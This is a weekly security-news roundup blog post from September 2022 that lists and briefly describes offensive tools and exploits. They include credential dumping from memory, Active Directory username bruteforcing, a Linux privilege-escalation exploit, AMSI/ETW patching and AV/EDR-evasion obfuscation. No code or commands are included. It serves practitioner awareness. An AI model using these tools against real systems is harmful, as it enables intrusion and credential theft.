Last Week in Security (LWiS) - 2022-09-19

CloudFox (@sethsec + @cvendramini2), MiraclePtr in Chrome, Jetty hacking (@m1ke_n1), ExternalC2 myths (@RET2_pwn), NTLMv1 attacks (@n00py1 + @an0n_r0), Golden Ticket patches soon (@varonis), plaintext Citrix passwords (@gentilkiwi), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2022-09-05 to 2022-09-19.

News

Techniques and Write-ups

Tools and Exploits

  • Mimikatz update. Now you can dump plaintext Citrix passwords from memory. Best part is you don't even need elevated rights for the current use context! If anyone has this as a BOF, DM me!
  • ldapnomnom - Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP).
  • CVE-2022-37706-LPE-exploit - A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04) - NOTE: only for enlightenment window manager (Tizen based TVs and... thats it?).
  • MasqueradingPEB - Maquerade any legitimate Windows binary by changing some fields in the PEB structure.
  • CVE North Stars - Leveraging CVEs as North Stars in vulnerability discovery and comprehension.
  • ExecRemoteAssembly - Execute Remote Assembly with args passing and with AMSI and ETW patching.
  • Teamsniper is a tool for fetching keywords in a Microsoft Teams such as (passwords, emails, database, etc.).
  • DylibHijackTest - Discover DYLD_INSERT_LIBRARIES hijacks on macOS.
  • Codecepticon is a .NET application that allows you to obfuscate C#, VBA/VB6 (macros), and PowerShell source code, and is developed for offensive security engagements such as Red/Purple Teams. What separates Codecepticon from other obfuscators is that it targets the source code rather than the compiled executables, and was developed specifically for AV/EDR evasion.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.